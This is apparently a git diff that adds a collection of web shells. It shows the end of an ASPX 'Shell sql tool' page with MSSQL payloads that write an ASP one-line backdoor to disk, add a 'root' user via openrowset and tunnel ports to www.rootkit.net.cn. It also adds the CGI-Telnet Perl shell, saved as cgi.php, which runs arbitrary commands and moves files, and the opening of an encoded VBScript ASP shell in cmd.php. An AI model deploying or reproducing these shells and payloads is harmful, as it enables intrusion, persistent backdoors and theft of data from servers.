Value="EXEC MASTER..XP_dirtree 'c:\',1,1">XP_dirtree</asp:ListItem><asp:ListItem Value="Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^&lt;%execute(request(char(35)))%^>>c:\bin.asp';">SP_oamethod exec</asp:ListItem><asp:ListItem Value="sp_makewebtask @outputfile='c:\bin.asp',@charset=gb2312,@query='select ''&lt;%execute(request(chr(35)))%&gt;'''">SP_makewebtask make file</asp:ListItem><asp:ListItem Value="exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell(&#34;cmd.exe /c net user root root/add &#34;)')">SandBox</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];">LogBackup</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='c:\bin.asp' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];">DatabaseBackup</asp:ListItem></asp:DropDownList>
+</div>
+<table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td> Run SQL </td></tr><tr><td><textarea id="jHIy" class="area" style="width:600px;height:60px;overflow:auto;" runat="server" rows="6" cols="1"></textarea></td></tr><tr><td>
+<asp:Button runat="server" ID="WOhJ" CssClass="bt" Text="Query" onclick="ORUgV"/></td></tr></table>
+<div style="overflow-x:auto;width:950px" >
+<p>
+<asp:DataGrid runat="server" ID="rom" HeaderStyle-CssClass="head" BorderWidth="0" GridLines="None" ></asp:DataGrid>
+</p>
+</div>
+</div>
+</div>
+<%--PortMap--%>
+<div id="hOWTm" runat="server">
+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
+<tr align="center">
+<td style="width:5%"></td>
+<td style="width:20%" align="left">Local Ip : <input class="input" runat="server" id="eEpm" type="text" size="20" value="127.0.0.1"/></td>
+<td style="width:20%" align="left">Local Port : <input class="input" runat="server" id="iXdh" type="text" size="20" value="3389"/></td>
+<td style="width:20%" align="left">Remote Ip : <input class="input" runat="server" id="llH" type="text" size="20" value="www.rootkit.net.cn"/></td>
+<td style="width:20%" align="left">Remote Port : <input class="input" runat="server" id="ZHS" type="text" size="20" value="80"/></td></tr>
+<tr align="center"><td colspan="5"><br/><asp:Button ID="FJE" CssClass="bt" runat="server" Text="MapPort" OnClick="wDZ"/> <asp:Button ID="giX" CssClass="bt" runat="server" Text="ClearAll" OnClick="vJNsE"/> <asp:Button ID="GFsm" CssClass="bt" runat="server" Text="Refresh" OnClick="tYoZ"/></td></tr></table></div>
+<%--Search--%>
+<div id="yhv" runat="server">
+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
+<tr align="center">
+<td style="width:20%" align="left">Keyword</td>
+<td style="width:60%" align="left"><textarea id="iaMKl" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
+<td style="width:20%" align="left"><input type="checkbox" runat="server" id="rAQ" value="1"/> Use Regex</td>
+</tr>
+<tr align="center">
+<td style="width:20%" align="left">Replace As</td>
+<td style="width:60%" align="left"><textarea id="qPe" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
+<td style="width:20%" align="left"><input type="checkbox" runat="server" id="YZw"/> Replace</td>
+</tr>
+<tr align="center">
+<td style="width:20%" align="left">Search FileType</td>
+<td style="width:60%" align="left"><input type="text" runat="server" class="input" id="UDLvA" style="width:100%" value="asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config"/></td>
+<td style="width:20%" align="left"><asp:DropDownList runat="server" ID="Ven" AutoPostBack="False" CssClass="list"><asp:ListItem Value="name">File Name</asp:ListItem><asp:ListItem Value="content" Selected="True">File Content</asp:ListItem></asp:DropDownList></td>
+</tr>
+<tr align="center">
+<td style="width:20%" align="left">Path</td>
+<td style="width:60%" align="left"><input type="text" class="input" id="NaLJ" runat="server" style="width:100%" /></td>
+<td style="width:20%" align="left"><asp:Button CssClass="bt" id="axy" runat="server" onclick="NBy" Text="Start" /></td>
+</tr>
+</table>
+<br/>
+<br/>
+<asp:Table ID="oJiym" runat="server" Width="100%" CellSpacing="0" >
+<asp:TableRow CssClass="head"><asp:TableCell Width="60%">File Path</asp:TableCell><asp:TableCell Width="20%">Last modified</asp:TableCell><asp:TableCell Width="20%">Size</asp:TableCell></asp:TableRow>
+</asp:Table>
+</div>
+</td></tr></table>
+<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">Copyright &copy; 2006-2009 <a href="http://alikaptanoglu.blogspot.com" target="_blank">Shell sql tool</a> All Rights Reserved.</div></div>
+</form>
+</body>
+</html>
\ No newline at end of file
diff --git a/php/cgi.php b/php/cgi.php
new file mode 100644
index 0000000..c3a2645
--- /dev/null
+++ b/php/cgi.php
@@ -0,0 +1,690 @@
+#!/usr/bin/perl
+#------------------------------------------------------------------------------
+# Copyright and Licence
+#------------------------------------------------------------------------------
+# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
+#
+# Copyright (C) 2001 Rohitab Batra
+# Permission is granted to use, distribute and modify this script so long
+# as this copyright notice is left intact. If you make changes to the script
+# please document them and inform me. If you would like any changes to be made
+# in this script, you can e-mail me.
+#
+# Author: Rohitab Batra
+# Author e-mail: rohitab@rohitab.com
+# Author Homepage: http://www.rohitab.com/
+# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
+# Product Support: http://www.rohitab.com/support/
+# Discussion Forum: http://www.rohitab.com/discuss/
+# Mailing List: http://www.rohitab.com/mlist/
+#------------------------------------------------------------------------------
+
+#------------------------------------------------------------------------------
+# Installation
+#------------------------------------------------------------------------------
+# To install this script
+#
+# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
+#    your server. For most servers, you may not need to modify this.
+# 2. Change the password in the Configuration section below.
+# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
+#    Configuration Section below.
+# 4. Upload the script to a directory on your server which has permissions to
+#    execute CGI scripts. This is usually cgi-bin. Make sure that you upload
+#    the script in ASCII mode.
+# 5. Change the permission (CHMOD) of the script to 755.
+# 6. Open the script in your web browser. If you uploaded the script in
+#    cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
+# 7. Login using the password that you specified in Step 2.
+#------------------------------------------------------------------------------
+
+#------------------------------------------------------------------------------
+# Configuration: You need to change only $Password and $WinNT. The other
+# values should work fine for most systems.
+#------------------------------------------------------------------------------
+$Password = "skyclad1";		# Change this. You will need to enter this
+				# to login.
+
+$WinNT = 0;			# You need to change the value of this to 1 if
+				# you're running this script on a Windows NT
+				# machine. If you're running it on Unix, you
+				# can leave the value as it is.
+
+$NTCmdSep = "&";		# This character is used to seperate 2 commands
+				# in a command line on Windows NT.
+
+$UnixCmdSep = ";";		# This character is used to seperate 2 commands
+				# in a command line on Unix.
+
+$CommandTimeoutDuration = 10;	# Time in seconds after commands will be killed
+				# Don't set this to a very large value. This is
+				# useful for commands that may hang or that
+				# take very long to execute, like "find /".
+				# This is valid only on Unix servers. It is
+				# ignored on NT Servers.
+
+$ShowDynamicOutput = 1;		# If this is 1, then data is sent to the
+				# browser as soon as it is output, otherwise
+				# it is buffered and send when the command
+				# completes. This is useful for commands like
+				# ping, so that you can see the output as it
+				# is being generated.
+
+# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
+
+$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
+$CmdPwd = ($WinNT ? "cd" : "pwd");
+$PathSep = ($WinNT ? "\\" : "/");
+$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
+
+#------------------------------------------------------------------------------
+# Reads the input sent by the browser and parses the input variables. It
+# parses GET, POST and multipart/form-data that is used for uploading files.
+# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
+# Other variables can be accessed using $in{'var'}, where var is the name of
+# the variable. Note: Most of the code in this function is taken from other CGI
+# scripts.
+#------------------------------------------------------------------------------
+sub ReadParse 
+{
+	local (*in) = @_ if @_;
+	local ($i, $loc, $key, $val);
+	
+	$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
+
+	if($ENV{'REQUEST_METHOD'} eq "GET")
+	{
+		$in = $ENV{'QUERY_STRING'};
+	}
+	elsif($ENV{'REQUEST_METHOD'} eq "POST")
+	{
+		binmode(STDIN) if $MultipartFormData & $WinNT;
+		read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
+	}
+
+	# handle file upload data
+	if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
+	{
+		$Boundary = '--'.$1; # please refer to RFC1867 
+		@list = split(/$Boundary/, $in); 
+		$HeaderBody = $list[1];
+		$HeaderBody =~ /\r\n\r\n|\n\n/;
+		$Header = $`;
+		$Body = $';
+ 		$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
+		$in{'filedata'} = $Body;
+		$Header =~ /filename=\"(.+)\"/; 
+		$in{'f'} = $1; 
+		$in{'f'} =~ s/\"//g;
+		$in{'f'} =~ s/\s//g;
+
+		# parse trailer
+		for($i=2; $list[$i]; $i++)
+		{ 
+			$list[$i] =~ s/^.+name=$//;
+			$list[$i] =~ /\"(\w+)\"/;
+			$key = $1;
+			$val = $';
+			$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
+			$val =~ s/%(..)/pack("c", hex($1))/ge;
+			$in{$key} = $val; 
+		}
+	}
+	else # standard post data (url encoded, not multipart)
+	{
+		@in = split(/&/, $in);
+		foreach $i (0 .. $#in)
+		{
+			$in[$i] =~ s/\+/ /g;
+			($key, $val) = split(/=/, $in[$i], 2);
+			$key =~ s/%(..)/pack("c", hex($1))/ge;
+			$val =~ s/%(..)/pack("c", hex($1))/ge;
+			$in{$key} .= "\0" if (defined($in{$key}));
+			$in{$key} .= $val;
+		}
+	}
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML Page Header
+# Argument 1: Form item name to which focus should be set
+#------------------------------------------------------------------------------
+sub PrintPageHeader
+{
+	$EncodedCurrentDir = $CurrentDir;
+	$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
+	print "Content-type: text/html\n\n";
+	print <<END;
+<html>
+<head>
+<title>CGI-Telnet Version 1.0</title>
+$HtmlMetaHeader
+</head>
+<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
+<table border="1" width="100%" cellspacing="0" cellpadding="2">
+<tr>
+<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
+<b><font color="#000080" size="2">#</font></b></td>
+<td bgcolor="#000080"><font face="Verdana" size="2" color="#FFFFFF"><b>CGI-Telnet Version 1.0 - Connected to $ServerName</b></font></td>
+</tr>
+<tr>
+<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
+<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> | 
+<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
+<a href="$ScriptLocation?a=logout">Disconnect</a> |
+<a href="http://www.rohitab.com/cgiscripts/cgitelnet.html">Help</a>
+</font></td>
+</tr>
+</table>
+<font color="#C0C0C0" size="3">
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the Login Screen
+#------------------------------------------------------------------------------
+sub PrintLoginScreen
+{
+	$Message = q$<pre><font color="#669999"> _____  _____  _____          _____        _               _
+/  __ \|  __ \|_   _|        |_   _|      | |             | |
+| /  \/| |  \/  | |   ______   | |    ___ | | _ __    ___ | |_
+| |    | | __   | |  |______|  | |   / _ \| || '_ \  / _ \| __|
+| \__/\| |_\ \ _| |_           | |  |  __/| || | | ||  __/| |_
+ \____/ \____/ \___/           \_/   \___||_||_| |_| \___| \__| 1.0
+                                         
+</font><font color="#FF0000">                      ______             </font><font color="#AE8300">© 2001, Rohitab Batra</font><font color="#FF0000">
+                   .-&quot;      &quot;-.
+                  /            \
+                 |              |
+                 |,  .-.  .-.  ,|
+                 | )(_o/  \o_)( |
+                 |/     /\     \|
+       (@_       (_     ^^     _)
+  _     ) \</font><font color="#808080">_______</font><font color="#FF0000">\</font><font color="#808080">__</font><font color="#FF0000">|IIIIII|</font><font color="#808080">__</font><font color="#FF0000">/</font><font color="#808080">_______________________
+</font><font color="#FF0000"> (_)</font><font color="#808080">@8@8</font><font color="#FF0000">{}</font><font color="#808080">&lt;________</font><font color="#FF0000">|-\IIIIII/-|</font><font color="#808080">________________________&gt;</font><font color="#FF0000">
+        )_/        \          / 
+       (@           `--------`
+             </font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
+$;
+#'
+	print <<END;
+<code>
+Trying $ServerName...<br>
+Connected to $ServerName<br>
+Escape character is ^]
+<code>$Message
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the message that informs the user of a failed login
+#------------------------------------------------------------------------------
+sub PrintLoginFailedMessage
+{
+	print <<END;
+<code>
+<br>login: admin<br>
+password:<br>
+Login incorrect<br><br>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form for logging in
+#------------------------------------------------------------------------------
+sub PrintLoginForm
+{
+	print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="a" value="login">
+login: admin<br>
+password:<input type="password" name="p">
+<input type="submit" value="Enter">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the footer for the HTML Page
+#------------------------------------------------------------------------------
+sub PrintPageFooter
+{
+	print "</font></body></html>";
+}
+
+#------------------------------------------------------------------------------
+# Retreives the values of all cookies. The cookies can be accesses using the
+# variable $Cookies{''}
+#------------------------------------------------------------------------------
+sub GetCookies
+{
+	@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
+	foreach $cookie(@httpcookies)
+	{
+		($id, $val) = split(/=/, $cookie);
+		$Cookies{$id} = $val;
+	}
+}
+
+#------------------------------------------------------------------------------
+# Prints the screen when the user logs out
+#------------------------------------------------------------------------------
+sub PrintLogoutScreen
+{
+	print "<code>Connection closed by foreign host.<br><br></code>";
+}
+
+#------------------------------------------------------------------------------
+# Logs out the user and allows the user to login again
+#------------------------------------------------------------------------------
+sub PerformLogout
+{
+	print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
+	&PrintPageHeader("p");
+	&PrintLogoutScreen;
+	&PrintLoginScreen;
+	&PrintLoginForm;
+	&PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function is called to login the user. If the password matches, it
+# displays a page that allows the user to run commands. If the password doens't
+# match or if no password is entered, it displays a form that allows the user
+# to login
+#------------------------------------------------------------------------------
+sub PerformLogin 
+{
+	if($LoginPassword eq $Password) # password matched
+	{
+		print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
+		&PrintPageHeader("c");
+		&PrintCommandLineInputForm;
+		&PrintPageFooter;
+	}
+	else # password didn't match
+	{
+		&PrintPageHeader("p");
+		&PrintLoginScreen;
+		if($LoginPassword ne "") # some password was entered
+		{
+			&PrintLoginFailedMessage;
+		}
+		&PrintLoginForm;
+		&PrintPageFooter;
+	}
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to enter commands
+#------------------------------------------------------------------------------
+sub PrintCommandLineInputForm
+{
+	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+	print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="a" value="command">
+<input type="hidden" name="d" value="$CurrentDir">
+$Prompt
+<input type="text" name="c">
+<input type="submit" value="Enter">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to download files
+#------------------------------------------------------------------------------
+sub PrintFileDownloadForm
+{
+	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+	print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="d" value="$CurrentDir">
+<input type="hidden" name="a" value="download">
+$Prompt download<br><br>
+Filename: <input type="text" name="f" size="35"><br><br>
+Download: <input type="submit" value="Begin">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to upload files
+#------------------------------------------------------------------------------
+sub PrintFileUploadForm
+{
+	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+	print <<END;
+<code>
+<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
+$Prompt upload<br><br>
+Filename: <input type="file" name="f" size="35"><br><br>
+Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
+Overwrite if it Exists<br><br>
+Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
+<input type="hidden" name="d" value="$CurrentDir">
+<input type="hidden" name="a" value="upload">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the timeout for a command expires. We need to
+# terminate the script immediately. This function is valid only on Unix. It is
+# never called when the script is running on NT.
+#------------------------------------------------------------------------------
+sub CommandTimeout
+{
+	if(!$WinNT)
+	{
+		alarm(0);
+		print <<END;
+</xmp>
+<code>
+Command exceeded maximum time of $CommandTimeoutDuration second(s).
+<br>Killed it!
+<code>
+END
+		&PrintCommandLineInputForm;
+		&PrintPageFooter;
+		exit;
+	}
+}
+
+#------------------------------------------------------------------------------
+# This function is called to execute commands. It displays the output of the
+# command and allows the user to enter another command. The change directory
+# command is handled differently. In this case, the new directory is stored in
+# an internal variable and is used each time a command has to be executed. The
+# output of the change directory command is not displayed to the users
+# therefore error messages cannot be displayed.
+#------------------------------------------------------------------------------
+sub ExecuteCommand
+{
+	if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
+	{
+		# we change the directory internally. The output of the
+		# command is not displayed.
+		
+		$OldDir = $CurrentDir;
+		$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
+		chop($CurrentDir = `$Command`);
+		&PrintPageHeader("c");
+		$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
+		print "<code>$Prompt $RunCommand</code>";
+	}
+	else # some other command, display the output
+	{
+		&PrintPageHeader("c");
+		$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+		print "<code>$Prompt $RunCommand</code><xmp>";
+		$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
+		if(!$WinNT)
+		{
+			$SIG{'ALRM'} = \&CommandTimeout;
+			alarm($CommandTimeoutDuration);
+		}
+		if($ShowDynamicOutput) # show output as it is generated
+		{
+			$|=1;
+			$Command .= " |";
+			open(CommandOutput, $Command);
+			while(<CommandOutput>)
+			{
+				$_ =~ s/(\n|\r\n)$//;
+				print "$_\n";
+			}
+			$|=0;
+		}
+		else # show output after command completes
+		{
+			print `$Command`;
+		}
+		if(!$WinNT)
+		{
+			alarm(0);
+		}
+		print "</xmp>";
+	}
+	&PrintCommandLineInputForm;
+	&PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function displays the page that contains a link which allows the user
+# to download the specified file. The page also contains a auto-refresh
+# feature that starts the download automatically.
+# Argument 1: Fully qualified filename of the file to be downloaded
+#------------------------------------------------------------------------------
+sub PrintDownloadLinkPage
+{
+	local($FileUrl) = @_;
+	if(-e $FileUrl) # if the file exists
+	{
+		# encode the file link so we can send it to the browser
+		$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
+		$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
+		$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
+		&PrintPageHeader("c");
+		print <<END;
+<code>
+Sending File $TransferFile...<br>
+If the download does not start automatically,
+<a href="$DownloadLink">Click Here</a>.
+</code>
+END
+		&PrintCommandLineInputForm;
+		&PrintPageFooter;
+	}
+	else # file doesn't exist
+	{
+		&PrintPageHeader("f");
+		print "<code>Failed to download $FileUrl: $!</code>";
+		&PrintFileDownloadForm;
+		&PrintPageFooter;
+	}
+}
+
+#------------------------------------------------------------------------------
+# This function reads the specified file from the disk and sends it to the
+# browser, so that it can be downloaded by the user.
+# Argument 1: Fully qualified pathname of the file to be sent.
+#------------------------------------------------------------------------------
+sub SendFileToBrowser
+{
+	local($SendFile) = @_;
+	if(open(SENDFILE, $SendFile)) # file opened for reading
+	{
+		if($WinNT)
+		{
+			binmode(SENDFILE);
+			binmode(STDOUT);
+		}
+		$FileSize = (stat($SendFile))[7];
+		($Filename = $SendFile) =~  m!([^/^\\]*)$!;
+		print "Content-Type: application/x-unknown\n";
+		print "Content-Length: $FileSize\n";
+		print "Content-Disposition: attachment; filename=$1\n\n";
+		print while(<SENDFILE>);
+		close(SENDFILE);
+	}
+	else # failed to open file
+	{
+		&PrintPageHeader("f");
+		print "<code>Failed to download $SendFile: $!</code>";
+		&PrintFileDownloadForm;
+		&PrintPageFooter;
+	}
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the user downloads a file. It displays a message
+# to the user and provides a link through which the file can be downloaded.
+# This function is also called when the user clicks on that link. In this case,
+# the file is read and sent to the browser.
+#------------------------------------------------------------------------------
+sub BeginDownload
+{
+	# get fully qualified path of the file to be downloaded
+	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
+		(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
+	{
+		$TargetFile = $TransferFile;
+	}
+	else # path is relative
+	{
+		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
+		$TargetFile .= $PathSep.$TransferFile;
+	}
+
+	if($Options eq "go") # we have to send the file
+	{
+		&SendFileToBrowser($TargetFile);
+	}
+	else # we have to send only the link page
+	{
+		&PrintDownloadLinkPage($TargetFile);
+	}
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the user wants to upload a file. If the
+# file is not specified, it displays a form allowing the user to specify a
+# file, otherwise it starts the upload process.
+#------------------------------------------------------------------------------
+sub UploadFile
+{
+	# if no file is specified, print the upload form again
+	if($TransferFile eq "")
+	{
+		&PrintPageHeader("f");
+		&PrintFileUploadForm;
+		&PrintPageFooter;
+		return;
+	}
+	&PrintPageHeader("c");
+
+	# start the uploading process
+	print "<code>Uploading $TransferFile to $CurrentDir...<br>";
+
+	# get the fullly qualified pathname of the file to be created
+	chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
+	$TransferFile =~ m!([^/^\\]*)$!;
+	$TargetName .= $PathSep.$1;
+
+	$TargetFileSize = length($in{'filedata'});
+	# if the file exists and we are not supposed to overwrite it
+	if(-e $TargetName && $Options ne "overwrite")
+	{
+		print "Failed: Destination file already exists.<br>";
+	}
+	else # file is not present
+	{
+		if(open(UPLOADFILE, ">$TargetName"))
+		{
+			binmode(UPLOADFILE) if $WinNT;
+			print UPLOADFILE $in{'filedata'};
+			close(UPLOADFILE);
+			print "Transfered $TargetFileSize Bytes.<br>";
+			print "File Path: $TargetName<br>";
+		}
+		else
+		{
+			print "Failed: $!<br>";
+		}
+	}
+	print "</code>";
+	&PrintCommandLineInputForm;
+	&PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the user wants to download a file. If the
+# filename is not specified, it displays a form allowing the user to specify a
+# file, otherwise it displays a message to the user and provides a link
+# through  which the file can be downloaded.
+#------------------------------------------------------------------------------
+sub DownloadFile
+{
+	# if no file is specified, print the download form again
+	if($TransferFile eq "")
+	{
+		&PrintPageHeader("f");
+		&PrintFileDownloadForm;
+		&PrintPageFooter;
+		return;
+	}
+	
+	# get fully qualified path of the file to be downloaded
+	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
+		(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
+	{
+		$TargetFile = $TransferFile;
+	}
+	else # path is relative
+	{
+		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
+		$TargetFile .= $PathSep.$TransferFile;
+	}
+
+	if($Options eq "go") # we have to send the file
+	{
+		&SendFileToBrowser($TargetFile);
+	}
+	else # we have to send only the link page
+	{
+		&PrintDownloadLinkPage($TargetFile);
+	}
+}
+
+#------------------------------------------------------------------------------
+# Main Program - Execution Starts Here
+#------------------------------------------------------------------------------
+&ReadParse;
+&GetCookies;
+
+$ScriptLocation = $ENV{'SCRIPT_NAME'};
+$ServerName = $ENV{'SERVER_NAME'};
+$LoginPassword = $in{'p'};
+$RunCommand = $in{'c'};
+$TransferFile = $in{'f'};
+$Options = $in{'o'};
+
+$Action = $in{'a'};
+$Action = "login" if($Action eq ""); # no action specified, use default
+
+# get the directory in which the commands will be executed
+$CurrentDir = $in{'d'};
+chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
+
+$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
+
+if($Action eq "login" || !$LoggedIn) # user needs/has to login
+{
+	&PerformLogin;
+}
+elsif($Action eq "command") # user wants to run a command
+{
+	&ExecuteCommand;
+}
+elsif($Action eq "upload") # user wants to upload a file
+{
+	&UploadFile;
+}
+elsif($Action eq "download") # user wants to download a file
+{
+	&DownloadFile;
+}
+elsif($Action eq "logout") # user wants to logout
+{
+	&PerformLogout;
+}
\ No newline at end of file
diff --git a/php/cmd.php b/php/cmd.php
new file mode 100644
index 0000000..8aabb2a
--- /dev/null
+++ b/php/cmd.php
@@ -0,0 +1,1102 @@
+<%@ LANGUAGE = VBScript.Encode%>
+<%//**Start Encode
+On Error Resume Next
+
+Dim myFSO,showdisks
+Set myFSO = CreateObject ("Scripting.FileSystemObject")
+showdisks=FALSE
+
+Server.ScriptTimeOut  = 7200
+Class FileUploader
+	Public  Files
+	Private mcolFormElem
+	Private Sub Class_Initialize()
+		Set Files = Server.CreateObject("Scripting.Dictionary")
+		Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
+	End Sub
+	Private Sub Class_Terminate()
+		If IsObject(Files) Then
+			Files.RemoveAll()
+			Set Files = Nothing
+		End If
+		If IsObject(mcolFormElem) Then
+			mcolFormElem.RemoveAll()
+			Set mcolFormElem = Nothing
+		End If
+	End Sub
+	Public Property Get Form(sIndex)
+		Form = ""
+		If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
+	End Property
+	Public Default Sub Upload()
+		Dim biData, sInputName
+		Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
+		Dim nPosFile, nPosBound
+		biData = Request.BinaryRead(Request.TotalBytes)
+		nPosBegin = 1
+		nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
+		If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
+		vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
+		nDataBoundPos = InstrB(1, biData, vDataBounds)
+		Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
+			nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
+			nPos = InstrB(nPos, biData, CByteString("name="))
+			nPosBegin = nPos + 6
+			nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
+			sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+			nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
+			nPosBound = InstrB(nPosEnd, biData, vDataBounds)
+			If nPosFile <> 0 And  nPosFile < nPosBound Then
+				Dim oUploadFile, sFileName
+				Set oUploadFile = New UploadedFile
+				nPosBegin = nPosFile + 10
+				nPosEnd =  InstrB(nPosBegin, biData, CByteString(Chr(34)))
+				sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+				oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
+				nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
+				nPosBegin = nPos + 14
+				nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
+				oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+				nPosBegin = nPosEnd+4
+				nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
+				oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
+				If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
+			Else
+				nPos = InstrB(nPos, biData, CByteString(Chr(13)))
+				nPosBegin = nPos + 4
+				nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
+				If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+			End If
+			nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
+		Loop
+	End Sub
+	Private Function CByteString(sString)
+		Dim nIndex
+		For nIndex = 1 to Len(sString)
+		   CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
+		Next
+	End Function
